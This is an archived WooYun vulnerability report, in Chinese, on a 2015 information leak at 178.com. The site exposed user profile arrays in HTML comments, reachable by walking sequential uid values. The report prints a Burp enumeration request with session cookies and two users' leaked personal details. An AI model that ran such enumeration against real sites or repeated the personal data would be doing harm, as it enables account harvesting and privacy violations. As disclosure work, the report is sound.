乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-08: 细节已通知厂商并且等待厂商处理中 2015-08-10: 厂商已经确认,细节仅向厂商公开 2015-08-20: 细节向核心白帽子及相关领域专家公开 2015-08-30: 细节向普通白帽子公开 2015-09-09: 细节向实习白帽子公开 2015-09-24: 细节向公众公开
178游戏重要站点敏感信息泄露
wooyun是一个非常好的学习平台。今天浏览漏洞 WooYun: 178游戏重要站点SQL注射之官渡之战 ,随手又自己测了一下,发现一处信息泄露。泄露信息包括:id,用户名,性别,生日(年龄),星座,邮箱,真实姓名,QQ,地址,电话等隐私信息。这段泄露的信息是在一段被注释掉的代码中,只有查看页面源文件才能看到。如
<!-- array(36) { ["id"]=> string(8) "36791303" ["username"]=> string(8) "qq981021" ["gender"]=> NULL ["birthday"]=> string(10) "1998-11-20" ["astro"]=> string(9) "天蝎座" ["resident"]=> NULL ["email"]=> string(17) "[email protected]" ["realname"]=> NULL ["qq"]=> NULL ["msn"]=> NULL ["cellphone"]=> NULL ["comefrom"]=> NULL ["gender_flag"]=> string(1) "1" ["r_province"]=> string(18) "内蒙古自治区" ["r_city"]=> string(9) "通辽市" ["r_district"]=> string(9) "奈曼旗" ["h_province"]=> string(18) "内蒙古自治区" ["h_city"]=> string(9) "通辽市" ["h_district"]=> string(9) "奈曼旗" ["bloodtype"]=> string(1) "3" ["marriage"]=> string(1) "1" ["customer"]=> NULL ["privacy"]=> string(250) "a:9:{s:5:"index";s:1:"0";s:4:"blog";s:1:"0";s:5:"album";s:1:"0";s:8:"comments";s:1:"0";s:4:"poll";s:1:"1";s:6:"search";s:1:"1";s:9:"footprint";s:1:"1";s:7:"friends";s:1:"1";s:3:"sms";a:5:{i:0;s:1:"1";i:1;s:1:"2";i:2;s:1:"3";i:3;s:1:"4";i:4;s:1:"5";}}" ["allow_search"]=> string(1) "1" ["srank"]=> array(2) { ["srank"]=> array(6) { ["bloodtype"]=> string(1) "1" ["marriage"]=> string(1) "1" ["birthday"]=> string(1) "0" ["astro"]=> string(1) "1" ["resident"]=> string(1) "0" ["home"]=> string(1) "1" } ["index"]=> array(7) { ["gender"]=> string(1) "1" ["bloodtype"]=> string(1) "1" ["marriage"]=> string(1) "1" ["birthday"]=> string(1) "1" ["astro"]=> string(1) "1" ["resident"]=> string(1) "1" ["home"]=> string(1) "1" } } ["notify"]=> NULL ["status"]=> string(1) "0" ["is_check"]=> string(1) "0" ["update_time"]=> string(1) "0" ["create_time"]=> string(1) "0" ["acc_email"]=> string(17) "[email protected]" ["acc_id"]=> string(8) "36791303" ["uid"]=> string(8) "36791303" ["acc_username"]=> string(8) "qq981021" ["acc_nickname"]=> string(8) "qq981021" ["nickname"]=> string(8) "qq981021"}-->
产生原因:
uid可以遍历,http://i.178.com/?uid=36791303直接查看其他注册用户信息,然后在对应的页面中查看源文件即可
如URL:
http://i.178.com/?uid=36792945
我就测试了一下,burp跑了一些uid,
GET /?uid=§36790000§ HTTP/1.1Host: i.178.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: _sid=46c23308cb0a98eab7e28be44c160709850008dd; _i=MyGjU0IJ9mk4gWh2UN145kkC8v82F6exNBdg%2BH4WcpjEufjFwzNwzg%3D%3D_bc62bd0a7e57b2536b39a3b54ee44046_1439008048; _l=1439007836; _178c=36809261%23%23testxxxx; _e=31536000; __utma=156161507.1140119810.1439007847.1439007847.1439007847.1; __utmb=156161507.4.10.1439007847; __utmc=156161507; __utmz=156161507.1439007847.1.1.utmcsr=account.178.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmt=1; CNZZDATA30044938=cnzz_eid%3D580410582-1439005044-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1439005044Connection: keep-aliveIf-Modified-Since: Sat, 08 Aug 2015 04:27:27GMT
uid从36790000到36809260,如图
危害:
由于178的登录只需要知道用户名或者邮箱即可登录,因此可被撞库,用户名被收集等
http://i.178.com/?uid=36791190
泄露处
<!-- array(36) { ["id"]=> string(8) "36791190" ["username"]=> string(15) "兰迪。奥顿" ["gender"]=> NULL ["birthday"]=> string(10) "1982-09-17" ["astro"]=> string(9) "处女座" ["resident"]=> NULL ["email"]=> string(17) "[email protected]" ["realname"]=> NULL ["qq"]=> NULL ["msn"]=> NULL ["cellphone"]=> NULL ["comefrom"]=> NULL ["gender_flag"]=> string(1) "1" ["r_province"]=> string(9) "四川省" ["r_city"]=> string(6) "遂宁" ["r_district"]=> string(9) "大英县" ["h_province"]=> string(9) "河南省" ["h_city"]=> string(9) "周口市" ["h_district"]=> string(9) "扶沟县" ["bloodtype"]=> string(1) "4" ["marriage"]=> string(1) "1" ["customer"]=> NULL ["privacy"]=> NULL ["allow_search"]=> string(1) "1" ["srank"]=> array(2) { ["srank"]=> array(6) { ["bloodtype"]=> string(1) "0" ["marriage"]=> string(1) "3" ["birthday"]=> string(1) "3" ["astro"]=> string(1) "3" ["resident"]=> string(1) "3" ["home"]=> string(1) "3" } ["index"]=> array(7) { ["gender"]=> string(1) "1" ["bloodtype"]=> string(1) "1" ["marriage"]=> string(1) "1" ["birthday"]=> string(1) "1" ["astro"]=> string(1) "1" ["resident"]=> string(1) "1" ["home"]=> string(1) "1" } } ["notify"]=> NULL ["status"]=> string(1) "0" ["is_check"]=> string(1) "0" ["update_time"]=> string(1) "0" ["create_time"]=> string(1) "0" ["acc_email"]=> string(17) "[email protected]" ["acc_id"]=> string(8) "36791190" ["uid"]=> string(8) "36791190" ["acc_username"]=> string(15) "兰迪。奥顿" ["acc_nickname"]=> string(15) "兰迪。奥顿" ["nickname"]=> string(15) "兰迪。奥顿"}-->
删除注释中的代码
危害等级:中
漏洞Rank:7
确认时间:2015-08-10 13:08
感谢洞主对完美世界的关注,我们将尽快修补该漏洞。
暂无